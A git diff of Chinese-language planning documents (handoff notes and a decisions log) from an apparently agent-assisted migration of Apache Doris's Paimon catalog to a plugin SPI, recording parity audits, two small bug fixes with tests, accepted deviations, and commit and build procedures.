PARITY_HOLDS,1 揪出真分歧 → 用户签字转 FIX 并已落**。 +## ✅ 本 session 完成(P4 MINOR/NIT 一次性 cleanup:2 fix + 15 accept) +P4「一次性 cleanup」:read-only 对抗 recon workflow `wf_6884d37b-8ef`(6 并行分类 agent 逐项对**当前**代码复核 + sentinel 专项 deep-dive + 2 对抗 skeptic 逐角度证伪 + completeness critic over 全批)。review §5/§7 去重 ~17 项 MINOR/NIT → 用户签字([D-057]):**fix 2 actionable + accept 15**([DV-035])。 -- ✅ **VERIFY FIX-HMS-CONFRES — PARITY_HOLDS**:key 拼写恰 `hive.conf.resources`(**无** `hive.config.resources` 别名——疑似 MAPPING-FLAG-KEYS 类 bug **证伪**);round-1 wiring 全在;**BE-downflow**(round-2 没测的部分)两侧同——legacy HMS hive-site.xml 本就不入 BE scan props。 -- ✅ **TRACE ANALYZE/列统计 — PARITY_HOLDS**:`getColumnStatistic` 两侧 `Optional.empty()`、`createAnalysisTask` byte-同、`ExternalAnalysisTask` engine-agnostic;空 fallback generic 于桥、与 legacy paimon 共享 → 非 regression。 -- ✅ **CHECK split-count 计账 — PARITY_HOLDS**:post-sub-split 数经共享父 `FileQueryScanNode.selectedSplitNum` 喂 `SqlBlockRuleMgr` 两侧同;2 项 divergence 均 cosmetic/NIT 且 **pre-date #9**(EXPLAIN inputSplitNum 行缺 + compress-suffix guard 缺-不可触发)。 -- 🔴→✅ **DDL 写 parity — 1 REAL_DIVERGENCE(MAJOR) → FIXED**:见下 P3-fix。其余 6 aspect parity/NIT(branch/tag 两侧都拒、editlog↔cache 序反转=NIT、error-code collapse=cosmetic [DV-034])。 +- ✅ **FIX-VARCHAR-BOUNDARY(N10.1)— `bcee91dcb52`**:`PaimonTypeMapping.toVarcharType` `len>=65533`→STRING vs legacy `PaimonUtil:241` `>65533`(65533=`MAX_VARCHAR_LENGTH` 合法 exact-fit VARCHAR)。纯连接器 1 字符 `>=`→`>`,display-only/零风险 exact-parity。新 `PaimonTypeMappingReadTest` fail-before 恰 65533 红→pass-after,260/0/0、checkstyle 0、import-gate 净。 +- ✅ **FIX-PARTITION-NULL-SENTINEL(sentinel,HANDOFF 标的「唯一真实数据边」)— `4b2c2190dc2`**:scan 路 `PaimonScanRange.populateRangeParams` 经 `ConnectorPartitionValues.normalize` 施 Hive-directory 哨兵 coercion(`\N`/`__HIVE_DEFAULT_PARTITION__`→isNull)——对 hudi(path-encoded 分区)对、对 paimon 错(paimon 分区值已 typed:genuine null=Java-null,哨兵从不出现)→ literal `\N`(paimon 不保留此 token)/`__HIVE_DEFAULT_PARTITION__` 字符串分区值在 native ORC/Parquet 读被误成 SQL NULL,diverge legacy `PaimonScanNode:323-326`。**修=纯连接器** scan `isNull=value==null` only(render genuine null=""),不动 shared `ConnectorPartitionValues`(hudi `HudiScanRange:226` 仍需)。commit 前 5-angle 对抗 review SAFE。新 `PaimonScanRangePartitionNullTest` 4-case,261/0/0、checkstyle 0、import-gate 净。 +- ⬜ **15 accept([DV-035])**:**M5.1**(唯一 FUNCTIONAL,transient-only:sys-table 列举远端 handle 预探瞬时失败→phantom「table not found」;**accept** 因 `getTableHandle` swallow-to-empty 是有意+有测契约 `failAuth→empty` 且共享 existence 谓词含 P3 createTable `remoteExists`,无 surgical 修);M9.1/M9.2(**假前提**——连接器跑同 `CredentialUtils` 路无 drop);M10.1/M10.2/M10.3/M7.1(display);M6.1/M6.2(perf);N2.1/M3.1/N4.1/C2(text);N3.1/M2.1(inert no-op);M4.1/M1.3(连接器**更** correct);M1.1(diagnostic)。 -### P3-fix `FIX-CREATE-TABLE-LOCAL-CONFLICT` — commit `67a9b9da6e3`([D-056]/[DV-034],纯 fe-core 桥,零 SPI/连接器/BE) -- **根因**:通用桥 `PluginDrivenExternalCatalog.createTable:293-309` 把 legacy `PaimonMetadataOps.performCreateTable:182-214` 的有序双探(先 remote `tableExist:190` 后 local `getTableNullable:206`,任一命中+`!IF NOT EXISTS`→`ERR_TABLE_EXISTS_ERROR` 1050)合并成单 `exists` OR,且只被 IF NOT EXISTS 臂消费 → `!IF NOT EXISTS` 臂忽略它无条件调 `metadata.createTable`。后果:**local-cache 命中但 remote 缺**(`lower_case_meta_names` 下 case-variant 折叠到既有本地表、case-sensitive remote 无)+`!IF NOT EXISTS` 时 legacy 报 1050 拒绝、plugin **静默在 remote 建重复表**(元数据腐败)。窄+backend-dependent(filesystem/jdbc 才中、HMS 小写化两侧都拒)但 silent correctness。通用桥 → MaxCompute/未来 iceberg/hudi 同受益。 -- **修=1 fe-core 文件**:单 OR 拆回 `remoteExists`/`localExists` 两臂,`!IF NOT EXISTS`+`localExists`→`ErrorReport.reportDdlException(ERR_TABLE_EXISTS_ERROR,name)`(legacy local 臂逐字);remote-only 仍 fall-through 连接器抛(**case-A 不动**、既有 intentional 测绿)。Option-2 外科最小修;**否决 Option 1 full-parity**(改非分歧 case-A+破既有测+越界)。残留 case-A/全 DDL-op error-code-generic = [DV-034] 留 P4 cleanup。 -- **守门**:fe-core `PluginDrivenExternalCatalogDdlRoutingTest` **fail-before 恰 1 新测红**("Expected DdlException…nothing was thrown")→ **pass-after 26/0/0**、checkstyle 0。真值闸=live-e2e(`lower_case_meta_names=1`+case-variant CREATE 无 IF NOT EXISTS 于 case-sensitive paimon catalog;既有 legacy paimon DDL regression 覆盖契约、本 fix 无 BE 改)。 - -## 🔜 下一个 session:选其一(无 P0/P1/P2/P3 阻塞剩余) -1. **P4 MINOR/NIT 一次性 cleanup**(review §5):多为 display-only(DESC Key/Extra/uniqueId、VARCHAR(65533)→STRING、EXPLAIN delete-split 计账、error-message 文本含 [DV-034] 的 error-code collapse)/ perf-architectural / benign。**唯一真实数据边 = partition null-sentinel**(`__HIVE_DEFAULT_PARTITION__`/`\N` 字面值被当 NULL,`PaimonScanRange.java:212-225` / `ConnectorPartitionValues.java:32-54` vs legacy `source/PaimonScanNode.java:323-326`)——值得单独定夺。 -2. **B8 legacy `datasource/paimon/*` 删除**(迄今每个 fix 都靠它做 side-by-side parity;P3 后 parity 已全核完,可以删了)。删前确认无 live 引用。 -3. **跨连接器 follow-up 批量**([DV-028]/[DV-030]/[DV-031]/[DV-032]/[DV-033]/[DV-034])—— hudi/iceberg full-adopter 同根因缝,将来批量 close(D-056 已替所有 plugin 连接器关掉 createTable-local-conflict 这一缝)。 +## 🔜 下一个 session:选其一(无 P0/P1/P2/P3/P4 阻塞剩余) +1. **B8 legacy `datasource/paimon/*` 删除**(迄今每个 fix 都靠它做 side-by-side parity;P3+P4 后 parity 已全核完,可以删了)。删前确认无 live 引用(legacy `PaimonExternalTable`/`PaimonScanNode`/`PaimonUtil`/`PaimonMetadataOps`/`metacache/paimon/*` 等;注意 cutover 后 `instanceof PaimonExternalTable` 站点已 dead,但删类前 grep 全 import + GsonUtils 注册 + `getEngine`/`SPI_READY_TYPES` 成员)。 +2. **跨连接器 follow-up 批量**([DV-028]/[DV-030]/[DV-031]/[DV-032]/[DV-033]/[DV-034]/**[DV-035]**)—— hudi/iceberg full-adopter 同根因缝(mapping-flag 键、createTable-local-conflict 已经 D-056 通用关掉、error-code collapse、display/text parity、sys-table transient 等),将来批量 close。 每条遵循 per-fix 流程(`step-by-step-fix` skill):设计 doc → 先拿当前代码复核 finding → 实现(连接器禁 import fe-core)→ build+UT(绝对 `-f`、**`-am`** 必带、读 surefire XML + `MVN_EXIT`、fail-before/pass-after)→ 独立 commit → SPI 改登 RFC + 用户签字入 decisions-log + 偏差入 deviations-log + 同步 task-list。 @@ -37,33 +30,32 @@ P3「**去查不是去改**」:4 项 plugin-vs-legacy paimon parity,对抗 a | **P0 BLOCKER** | ✅1·✅2·✅3·✅4 | **全清** | | **P1 MAJOR** | ✅5·✅6·✅7 | **全清** | | **P2 perf-parity** | ✅8.`FIX-COUNT-PUSHDOWN` · ✅9.`FIX-NATIVE-SUBSPLIT` | **全清** | -| **P3 覆盖缺口(去查)** | ✅ HMS-CONFRES parity · ✅ ANALYZE parity · ✅ split-count parity · ✅ DDL → `FIX-CREATE-TABLE-LOCAL-CONFLICT` landed `67a9b9da6e3` | **全完成**(3 parity + 1 fix;对抗 audit `wf_25450c36-b7a`) | -| **P4 MINOR/NIT** | ⬜ 见 review §5 | 一次性 cleanup;partition null-sentinel 是唯一真实数据边;error-code collapse [DV-034] 含其中。 | -| **B8 legacy 删除** | ⬜ | parity 已全核完,可删 `datasource/paimon/*`。 | +| **P3 覆盖缺口(去查)** | ✅ HMS-CONFRES · ✅ ANALYZE · ✅ split-count parity · ✅ DDL→`FIX-CREATE-TABLE-LOCAL-CONFLICT` `67a9b9da6e3` | **全完成** | +| **P4 MINOR/NIT** | ✅ `FIX-VARCHAR-BOUNDARY` `bcee91dcb52` · ✅ `FIX-PARTITION-NULL-SENTINEL` `4b2c2190dc2` · ⬜ 15 accept [DV-035] | **全完成**(2 fix + 15 accept;recon `wf_6884d37b-8ef`) | +| **B8 legacy 删除** | ⬜ | parity 已全核完(P3+P4),可删 `datasource/paimon/*`。 | --- # 📦 仓库状态 -- **HEAD = `67a9b9da6e3`**(`fix: FIX-CREATE-TABLE-LOCAL-CONFLICT`,P3-derived)。其父 = `2f5f467f53d`(#9 NATIVE-SUBSPLIT)。本 HANDOFF 更新单独 `docs:` 提(见下条 commit)。 +- **HEAD = 本 docs 提**(更新 decisions/deviations/task-list/HANDOFF/memory)。其父 = `4b2c2190dc2`(sentinel fix)。 +- 迁移链:…→`67a9b9da6e3`(P3-fix)→`bcee91dcb52`(P4 N10.1 VARCHAR-BOUNDARY)→`4b2c2190dc2`(P4 sentinel PARTITION-NULL-SENTINEL)→**本 docs 提(HEAD)**。 - ⚠️ **`regression-test/conf/regression-conf.groovy` 仍 modified-未 commit 且含明文 Aliyun key** —— commit 前继续 path-whitelist,**严禁 `git add -A`**。`regression-conf.groovy.bak` 同理排除。 - scratch 仍未 commit(`.audit-scratch/` `conf.cmy/` `META-INF/`)。 - 当前分支 `catalog-spi-07-paimon`(非 `master`)。 -- **legacy `datasource/paimon/*` 仍在树内**(B8 删除未做)→ 仍可 side-by-side diff 做 parity(但 P3 后已无待核 parity,见上「下一步」选项 2)。 -- 迁移链:…→`2f5f467f53d`(#9 NATIVE-SUBSPLIT)→`67a9b9da6e3`(P3-fix CREATE-TABLE-LOCAL-CONFLICT, HEAD)。 +- **legacy `datasource/paimon/*` 仍在树内**(B8 删除未做)→ 仍可 side-by-side diff(但 P3+P4 后已无待核 parity,见上「下一步」选项 1)。 ## ⚠️ Commit 须知(任何 `git add` 前必读) - **硬前置**:scrub `regression-test/conf/regression-conf.groovy`(明文 Aliyun key)+ 清 scratch(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。**path-whitelist `git add`,严禁 `git add -A`。** - 每个 fix 独立 commit;message = `fix: ` + 根因 + 解法 + 测试,末尾带 `Co-Authored-By: Claude Opus 4.8 (1M context) `。 -- 改 fe-core/SPI 的 fix:commit 须含相关两侧 + 测试。本 P3-fix 纯 fe-core 桥单侧(含 test)。 ## ⚙️ 操作须知(复用) -- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。改 fe-core 须单独 `-pl :fe-core -am`。**checkstyle**:连接器 `mvn -pl :fe-connector-paimon checkstyle:check`;fe-core `mvn -pl :fe-core checkstyle:check`(exit 0 即净)。 -- 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(仅允许 `org.apache.doris.{thrift,connector,extension,filesystem}`)。**本 P3-fix 改的是 fe-core 桥,不涉 import-gate。** +- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。改 fe-core 须单独 `-pl :fe-core -am`。**checkstyle**:连接器 `mvn -pl :fe-connector-paimon checkstyle:check`;fe-core `mvn -pl :fe-core checkstyle:check`。 +- 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(仅允许 `org.apache.doris.{thrift,connector,extension,filesystem}`)。 - cwd 跨 Bash 调用持久,`cd` 破相对路径 → 一律绝对路径。 -- 测试优先 runnable FE 单测。fe-core 桥测 harness:`PluginDrivenExternalCatalogDdlRoutingTest`(Mockito 构造 `ExternalDatabase`/`metadata`/`session`、`MockedStatic`、`mockEditLog`);连接器测 harness:`RecordingConnectorContext`/`RecordingPaimonCatalogOps`/`FakePaimonTable`/`PaimonScanPlanProviderTest`。live-e2e CI-gated → 注明 gated,勿谎称跑过。 +- 测试优先 runnable FE 单测。连接器测 harness:`RecordingConnectorContext`/`RecordingPaimonCatalogOps`/`FakePaimonTable`/`PaimonScanPlanProviderTest`;P4 新增 `PaimonTypeMappingReadTest`(read-direction 类型映射)/`PaimonScanRangePartitionNullTest`(`populateRangeParams` 分区 isNull)。live-e2e CI-gated → 注明 gated,勿谎称跑过。 ## 🧠 给下一个 agent 的 meta -- **P3 验证模式(再次奏效)**:finding → **多-item 对抗 audit workflow**(tracer 独立判断 → 对抗 verifier 逐条**证伪 parity 声明**→ completeness critic 抓未追 aspect)→ 真分歧 AskUserQuestion 定 scope → 转 FIX 走 per-fix 流程。**本轮对抗 verifier 把 tracer 的 createTable PARITY 推翻为 DIVERGENCE**(tracer 只看到 IF-NOT-EXISTS 短路对、没看到 !IF-NOT-EXISTS 臂丢 local-arm)——**教训:parity 核查里「短路对」≠「全分支对」,对抗 verifier 价值在逐分支证伪**。 -- **P3-fix 关键定夺**:通用桥 bug(非 paimon-specific),Option-2 外科最小修(仅补 local-conflict 闸、不动 case-A remote-hit 路),保既有 intentional 测绿;否决 Option-1 full-parity(越 finding 界)。 -- **completeness critic 的残留**(均评估为 benign,未翻 verdict,可按需深挖):① HMS-CONFRES 的 DLF BE-downflow 由 HMS 路类推非独立 trace(两侧对称 drop,低危);② DDL editlog/cache replay 收敛只展示了 plugin metadataOps==null 臂、legacy metadataOps!=null 臂未展示(同步 DDL 内 benign);③ split-count 的 `SqlBlockRuleMgr` 实际消费 call-site 未引(共享父代码、构造即同)。 -- **跨连接器 follow-up 累积**:[DV-028]/[DV-030]/[DV-031]/[DV-032]/[DV-033]/**[DV-034]** —— hudi/iceberg full-adopter 同复发,将来批量 close。 +- **P4 recon 模式(对抗 recon 两次见效)**:read-only 分类 workflow(多并行 classifier 逐项对**当前**代码复核 + 专项 deep-dive + 对抗 skeptic 逐角度证伪 + completeness critic)→ 真分歧 / 假前提区分 → AskUserQuestion 定 scope → 转 FIX 或 accept。**(1) sentinel deep-dive 的 ACCEPT 被 prune-路 skeptic 推翻**为真分歧(教训:partition-null parity 必须 scan **和** prune 双路看,`\N` 非 paimon-保留 token)。**(2) M5.1 的「cheap static fallback」(completeness critic) 被实现层核查证伪**——swallow-to-empty 是有意+有测契约 → flip 回 accept(教训:critic 的 fix 建议须落到代码契约/测试层再判 effort,别照单转 FIX)。 +- **sentinel fix 关键**:`ConnectorPartitionValues` 是 shared API(paimon+hudi),hudi path-encoded 分区**需要** Hive 哨兵 coercion,故修必须 paimon-local(不动 shared 类)。BE 在 `is_null==true` 时忽略 render string(`partition_column_filler.h:40-44` early-return),故 genuine-null 的 `\N`-vs-`""` render diff **不可观测**——这是 sentinel「genuine-null 无 regression」的根据。 +- **M5.1 残留**:若将来要修,唯一干净路 = SPI 加 `listSupportedSysTables(session)` no-handle overload(bridge 不经远端 existence gate 列静态名)——但会重引 legacy「为不存在 base 表列 sys-table」quirk + SPI surface churn,且须 RFC + 用户签字。broad `getTableHandle` retype 破有意 `failAuth→empty` 契约 + 触 P3 createTable fix,已否决。 +- **跨连接器 follow-up 累积**:[DV-028]/[DV-030]/[DV-031]/[DV-032]/[DV-033]/[DV-034]/**[DV-035]** —— hudi/iceberg full-adopter 同复发,将来批量 close。 diff --git a/plan-doc/decisions-log.md b/plan-doc/decisions-log.md index 6a2ef8720564b6..601cc9a2f9be39 100644 --- a/plan-doc/decisions-log.md +++ b/plan-doc/decisions-log.md @@ -15,6 +15,7 @@ | 编号 | 别名 | 简述 | 日期 | 状态 | |---|---|---|---|---| +| D-057 | P4 cleanup | **P4 MINOR/NIT 一次性 cleanup scope(用户签字,2026-06-12)= fix `N10.1`(VARCHAR-BOUNDARY) + `sentinel`(PARTITION-NULL-SENTINEL);accept M5.1 + 其余 14 项为 deviation [DV-035]**:review §5 + §7 去重得 ~17 项 MINOR/NIT,read-only 对抗 recon(`wf_6884d37b-8ef`:6 并行分类 + 2 sentinel 证伪 skeptic + completeness critic)逐项对当前代码复核。3 项 actionable,14 项确认 display/perf/text/benign/连接器-更-correct/false-premise → 批量 accept。**(1) N10.1**=`PaimonTypeMapping.toVarcharType` 用 `>=65533` over-widen 至 STRING vs legacy `>65533`(65533=`MAX_VARCHAR_LENGTH` 是合法 exact-fit VARCHAR);纯连接器 1 字符修 `>=`→`>`,display-only 但零风险 exact-parity(`bcee91dcb52`)。**(2) sentinel**=`PaimonScanRange.populateRangeParams` 经 `ConnectorPartitionValues.normalize` 施 Hive-directory 哨兵 coercion(`\N`/`__HIVE_DEFAULT_PARTITION__`→isNull)——对 hudi(path-encoded)对、对 paimon 错(paimon 分区值已 typed:genuine null=Java-null,哨兵从不出现)→ 一个 literal `\N`(paimon 不保留)/`__HIVE_DEFAULT_PARTITION__` 字符串分区值在 native ORC/Parquet 读被误成 SQL NULL。**对抗 verifier 推翻 sentinel deep-dive 的 ACCEPT 结论**(deep-dive 只看 scan 路、漏了 Nereids prune 路 `TablePartitionValues:162` + 误把 `\N` 当 Hive-保留)。修=纯连接器 scan 侧 `isNull=value==null` only(legacy `PaimonScanNode:323-326` parity,render genuine null=""),不动 shared `ConnectorPartitionValues`(hudi 仍需);prune-路残留=pre-existing generic fe-core,out-of-scope(`4b2c2190dc2`,commit 前 5-angle 对抗 review SAFE)。**(3) M5.1(accept-flip)**:completeness critic 误判有「cheap static fallback」→实现层核查证伪——`getTableHandle` 的 swallow-transient-to-empty 是**有意+有测**契约(`PaimonConnectorMetadataReadAuthTest:150` 钉 `failAuth→empty`)且是共享 existence 谓词(含 P3 createTable `remoteExists:295` + `tableExists:239`),`listSupportedSysTables` 忽略 handle。无 surgical 零成本修;唯一干净修需 SPI 加法或破有意契约 → **transient-only severity,用户签字 accept**([DV-035])。否决:broad `getTableHandle` retype(破有意契约+触 P3 fix)、SPI no-handle list(surface churn + 重引 legacy「为不存在表列 sys-table」quirk)。详 [task-list §P4](./task-list-P5-rereview2-fixes.md) | 2026-06-12 | ✅ | | D-056 | P3-fix | **FIX-CREATE-TABLE-LOCAL-CONFLICT(P3 覆盖缺口核查揪出的真分歧,MAJOR correctness)= fix-now(用户签字,2026-06-12)+ Option-2 外科最小修(仅补 local-conflict 闸,不动 remote-hit 路)**:P3「去查」对抗 review(`wf_25450c36-b7a`,4 项 plugin-vs-legacy paimon parity;tracer→对抗 verifier→completeness critic)3 项 PARITY_HOLDS(HMS-CONFRES:key 拼写恰 `hive.conf.resources` 无 `config.resources` 别名、round-1 wiring 在、BE-downflow 两侧同——legacy HMS hive-site.xml 本就不入 BE scan props;ANALYZE/列统计:`getColumnStatistic` 两侧 `Optional.empty()`、`createAnalysisTask` byte-同;split-count:post-sub-split 数经共享父 `FileQueryScanNode.selectedSplitNum` 喂 `SqlBlockRuleMgr` 两侧同,2 项 cosmetic/NIT 且 pre-date #9),唯 DDL 写揪出真分歧:通用 fe-core 桥 `PluginDrivenExternalCatalog.createTable` 把 legacy `PaimonMetadataOps.performCreateTable:182-214` 的**有序双探**(先 remote `tableExist:190` 后 local `getTableNullable:206`,任一命中+`!IF NOT EXISTS`→`ERR_TABLE_EXISTS_ERROR` 1050)**合并成单 `exists` OR**(`:293-295`),且 `exists` **只被 IF NOT EXISTS 臂消费**(`:296`)→`!IF NOT EXISTS` 臂(`:303-309`)忽略它无条件调 `metadata.createTable`。后果:**local-cache 命中但 remote 缺**(`lower_case_meta_names` 下 case-variant 折叠到既有本地表、case-sensitive remote 无此表)+`!IF NOT EXISTS` 时,legacy 报 1050 拒绝、plugin **静默在 remote 建重复表**(元数据腐败)。触发窄+backend-dependent(filesystem/jdbc case-sensitive 才中;HMS 小写化两侧都拒)但 silent correctness。**通用桥**(paimon+MaxCompute+未来 iceberg/hudi 共用)→修一处跨连接器收口。**修=纯 fe-core 桥、零 SPI/连接器/BE**:单 OR 拆回 `remoteExists`/`localExists` 两臂,`!IF NOT EXISTS` 下 `localExists`→`ErrorReport.reportDdlException(ERR_TABLE_EXISTS_ERROR,name)`(legacy local 臂逐字);remote-only 仍 fall-through 连接器抛(case-A 不动、既有 intentional 测绿)。**否决 Option 1 full-parity**(对整 `exists&&!ifNotExists` retype 1050)——改非分歧 case-A+破既有测+越界;case-A error-code-generic 是 pre-existing 跨全 DDL op cosmetic 残留=[DV-034]。守门:fe-core `PluginDrivenExternalCatalogDdlRoutingTest` **fail-before 恰 1 新测红**("Expected DdlException…nothing was thrown")→**pass-after 26/0/0**、checkstyle 0。真值闸=live-e2e(`lower_case_meta_names=1`+case-variant CREATE 无 IF NOT EXISTS 于 case-sensitive paimon catalog;既有 legacy paimon DDL regression 覆盖契约、本 fix 无 BE 改)。设计 [`P5-fix-CREATE-TABLE-LOCAL-CONFLICT-design.md`](./tasks/designs/P5-fix-CREATE-TABLE-LOCAL-CONFLICT-design.md) | 2026-06-12 | ✅ | | D-055 | P5-fix#9 | **FIX-NATIVE-SUBSPLIT(M-3,round-2 MAJOR/round-1 MINOR,perf-parity)= fix-now(用户签字,2026-06-12)+ 纯连接器零 SPI/零 fe-core**:翻闸后大 native ORC/Parquet paimon 文件得**一个** scanner(无文件内并行)——连接器 native 臂每 RawFile 发**一个** `PaimonScanRange`(`.start(0).length(file.length())`),legacy `PaimonScanNode:434-465` 经 `determineTargetFileSplitSize`+`fileSplitter.splitFile` 把大文件切成多 split。结果正确仅并行度回归。recon(5-scout + 对抗 synthesizer `wf_ad764bf6-1c9`)三大结论:① **真 gap 非 no-op**——ORC/Parquet `compressType=PLAIN`(`FileSplitter:115`),`(!splittable||!=PLAIN)` 闸不触发→真切分跑;② **DV×sub-split 安全无须 guard**——paimon DV rowid 是文件**全局**行位置,BE native reader 在部分 byte range 内仍报全局行位(ORC `getRowNumber()` 由 stripe 起播种、Parquet `first_row` 跨 row-group 累计),`_kv_cache` 按 `path+offset` 跨 sub-split 共享 DV 位图,iceberg 用同机制于常规切分文件→**规则=同一 per-RawFile DeletionFile 原样附到每个 sub-range、不 re-base offset**(legacy `:459-460` parity);③ **纯连接器**——切分 math 是对 5 个 session var(`VariableMgr.toMap` 通道,同 `isCppReaderEnabled`)的 long 算术,连接器禁 import fe-core `FileSplitter`/`SessionVariable` 故逐字重述;`start/length/fileSize` 经既有 `PaimonScanRange.Builder`→`PluginDrivenSplit` FileSplit ctor→`FileQueryScanNode.createFileRangeDesc` 已序列化到 BE。**仅 specified-size 分支可达**(连接器传 blockLocations=null + target 恒>0 因 paimon 非 batch;block-based 分支死)。**修=纯连接器**:2 纯静态(`computeFileSplitOffsets` 逐字移植含 **`>1.1D` 尾吸收 guard**、`determineTargetSplitSize` 移植 determineTargetFileSplitSize+applyMaxFileSplitNumLimit 略去 isBatchMode→0)+ `sessionLong`/`resolveTargetSplitSize`(lazy once)+ native 臂改 buildNativeRange 加 (start,length) 内层 loop。守门:连接器 256/0/0(1 CI-gated skip)、checkstyle 0、import-gate 净、**fail-before 恰 3 splitting 测红**(neuter `computeFileSplitOffsets`→单 range)其余绿、end-to-end append-only 真表小 file_split_size→≥2 contig sub-range。split-weight 调度 nicety 不移植(pre-existing native 路已缺)= [DV-033]。真值闸=live-e2e 大文件并行 + DV-file 多 range 读(既有 legacy paimon regression 覆盖 BE 契约、本 fix 无 BE 改)。设计 [`P5-fix-NATIVE-SUBSPLIT-design.md`](./tasks/designs/P5-fix-NATIVE-SUBSPLIT-design.md) | 2026-06-12 | ✅ | | D-054 | P5-fix#8 | **FIX-COUNT-PUSHDOWN(M-2,round-2 MAJOR/round-1 MINOR,perf-parity)= fix-now + 新增 default `planScan` 7-arg overload 携 `boolean countPushdown` + 连接器 collapse-to-one(用户签字,2026-06-12)**:翻闸后 plugin-driven paimon `COUNT(*)` **结果正确但慢**——COUNT 枚举已达 BE(`FileScanNode.toThrift:90` 发 `pushDownAggNoGroupingOp`、`PhysicalPlanTranslator:873` 在 plugin 节点设 COUNT、未排除)且 per-range emit 缝**已建全**(`PaimonScanRange.Builder.rowCount`→`paimon.row_count`→`setTableLevelRowCount`,与 legacy `PaimonScanNode:303-308` byte-一致),唯独**信号+计算**缺:merged count `DataSplit.mergedRowCount()` 是 paimon-SDK-only 须连接器算,而 COUNT 信号 `getPushDownAggNoGroupingOp()==COUNT` 只在 fe-core 节点、`PluginDrivenScanNode.getSplits` 从不读(grep 0)也不在任何 `planScan`/`ConnectorSession`/`ConnectorContext`/handle → 连接器每 split 发 `table_level_row_count=-1` → BE 物化全 post-merge 行去 count(`file_scanner.cpp:1298-1326`),PK/MOR merge 表尤贵。**故非纯连接器(更正动手前 framing)**:信号须过 SPI 边界。**否决经 `ConnectorSession` 穿**(FIX-FORCE-JNI 先例)——agg-op 是 per-query planner 输出非 SET-var,会成静默无类型通道(本项目反复踩的 bug 类)。**用户定(vs defer)= fix-now**,且 **count-split 形状 = 连接器 collapse-to-one**(vs full-parity fe-core trim / vs per-split)。**修=3 文件**:① SPI `ConnectorScanPlanProvider` +1 **default** 7-arg `planScan(...,boolean countPushdown)` 委托 6-arg(镜像 limit/requiredPartitions 扩展链,其余连接器零改 no-op)[E15];② fe-core `PluginDrivenScanNode.getSplits` 读 `getPushDownAggNoGroupingOp()==TPushAggOp.COUNT` 传入(**无 post-loop 数学**);③ 连接器抽 `planScanInternal(...,countPushdown)`(4-arg 委托 false、7-arg 委托 flag)+ count 短路(**第一 routing 臂**,count-eligible split 不再发数据 range,否则 BE 双计 vs DV/PK-merge):累加全 eligible split 的 `mergedRowCount` 入 `countSum`、留首个为代表、循环后发**一** JNI count range 携 `countSum`(=legacy `<=10000` singletonList+assignCountToSplits 收一 split case);无 merged count 的 split 走常规 native/JNI 路 BE 自计(footer/物化)。两新成员=纯静态 `isCountPushdownSplit(boolean,DataSplit)`(mutation-test 路由闸)+ `buildCountRange`。**参数形状 `boolean`**(BE 只需 COUNT-vs-not、`TPushAggOp` 过度泛化)+ **paimon-only**=工程判断(未被否)。legacy `>10000` 并行 split trim **有意丢**(连接器无 numBackends,fe-core-only)= perf-only 偏差 [DV-032]。守门:连接器 252/0/0(1 CI-gated skip)、fe-core compile+checkstyle 0、import-gate 净、**fail-before 恰 2 新测红**(neuter `isCountPushdownSplit`→false)其余 33 绿、end-to-end 真 local PK 表测断言 collapse-to-one 携 merged total(2)。真值闸=live-e2e BE CountReader 选择/EXPLAIN(既有 legacy paimon count regression 覆盖 BE 契约、本 fix 无 BE 改)。设计 [`P5-fix-COUNT-PUSHDOWN-design.md`](./tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md) | 2026-06-12 | ✅ | @@ -68,6 +69,19 @@ ## 详细记录(时间倒序) +### D-057 — P4 MINOR/NIT 一次性 cleanup scope = fix 2(N10.1 + sentinel)+ accept 15(M5.1 + 14) +- **状态**:✅ 生效中|**日期**:2026-06-12|**签字**:用户(AskUserQuestion ×2) +- **背景**:P0/P1/P2/P3 全清后,HANDOFF 留 P4「一次性 cleanup」。review §5(MINOR/NIT 紧凑表)+ §7(completeness critic)去重得 ~17 项。HANDOFF 标唯一「真实数据边」= partition null-sentinel,值得单独定夺;其余多为 display-only/perf/text/benign。 +- **方法**:read-only 对抗 recon workflow `wf_6884d37b-8ef`——6 并行分类 agent 逐项对**当前**代码复核(line refs 可能已漂移)+ classify(DATA/FUNCTIONAL/DISPLAY/PERF/TEXT/BENIGN)+ fixScope(连接器禁 import fe-core,故触 fe-core-only 类型者非纯连接器);sentinel 专项 deep-dive + 2 对抗 skeptic 逐角度证伪 + completeness critic over 全批。 +- **结论(3 actionable + 14 accept)**: + - **N10.1 FIX**(`bcee91dcb52`):`PaimonTypeMapping.toVarcharType` `len>=65533`→STRING vs legacy `PaimonUtil:241` `>65533`;65533=`MAX_VARCHAR_LENGTH` 合法 exact-fit VARCHAR。纯连接器 1 字符 `>=`→`>`,display-only/零风险。新 `PaimonTypeMappingReadTest` fail-before 恰 65533 红 → pass-after,260/0/0。 + - **sentinel FIX**(`4b2c2190dc2`):scan 路 `ConnectorPartitionValues.normalize` 施 Hive-directory 哨兵 coercion 对 paimon 错(值已 typed,null=Java-null,哨兵从不出现)→ literal `\N`/`__HIVE_DEFAULT_PARTITION__` 分区值被误 NULL。**对抗 verifier 推翻 deep-dive ACCEPT**(漏 Nereids prune 路 `TablePartitionValues:162`;`\N` 非 paimon-保留)。修=纯连接器 scan `isNull=value==null` only(legacy `PaimonScanNode:323-326` parity),不动 shared `ConnectorPartitionValues`(hudi 经 `HudiScanRange:226` 仍需 Hive coercion)。commit 前 5-angle 对抗 review SAFE(全 3 range builder 汇于 `populateRangeParams`、无 query correct→wrong、BE isNull=true 时忽略 render string `partition_column_filler.h:40-44`、Java-null 保真、hudi 不动)。新 `PaimonScanRangePartitionNullTest` 4-case,261/0/0。 + - **M5.1 ACCEPT(flip)**:completeness critic 误设「cheap static fallback」前提,实现层证伪——`PaimonConnectorMetadata.getTableHandle:169-172` swallow-非NotExist-为-empty 是**有意+有测**契约(`PaimonConnectorMetadataReadAuthTest:150` `failAuth→empty`)且是共享 existence 谓词(`PluginDrivenExternalCatalog:239` tableExists + `:295` P3 createTable 